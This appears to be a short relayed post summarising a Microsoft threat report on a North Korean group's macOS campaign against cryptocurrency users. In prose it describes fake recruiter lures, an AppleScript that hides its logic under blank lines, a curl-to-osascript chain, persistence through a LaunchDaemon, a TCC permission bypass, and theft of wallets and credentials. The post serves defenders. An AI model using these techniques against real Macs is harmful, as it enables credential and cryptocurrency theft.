(microsoft.com) Sapphire Sleet macOS Campaign: Social Engineering, Credential Harvesting, and Multi-Stage Payload Delivery Targeting Cryptocurrency Sectors
-
(microsoft.com) Sapphire Sleet macOS Campaign: Social Engineering, Credential Harvesting, and Multi-Stage Payload Delivery Targeting Cryptocurrency Sectors
North Korean APT Sapphire Sleet (aka BlueNoroff) is actively targeting macOS users in cryptocurrency, finance, and blockchain sectors via a multi-stage social engineering campaign. No CVEs—just deception.
In brief - Sapphire Sleet lures targets with fake recruiter profiles and Zoom SDK update lures, harvesting credentials via fake macOS dialogs, bypassing TCC/Gatekeeper, and exfiltrating wallets, browser creds, Telegram sessions, and keychain data. Apple has deployed mitigations following coordinated disclosure.
Technically - The attack begins with a compiled AppleScript lure (Zoom SDK Update.scpt) hiding malicious logic under blank lines. Execution triggers a curl-to-osascript chain (mac-cur1–5 UAs) deploying com.apple.cli, services backdoor, and icloudz (reflective loader via NSCreateObjectFileImageFromMemory). Persistence is achieved via LaunchDaemon (com.google.chromes.updaters). Credential harvesting uses systemupdate.app (dscl -authonly validation) and Telegram Bot API exfil. TCC bypass involves Finder-assisted TCC.db manipulation to grant osascript AppleEvents permissions. A 575-line AppleScript exfiltrates 7 data categories (wallets, SSH keys, Notes) over port 8443.
-
R relay@relay.infosec.exchange shared this topic
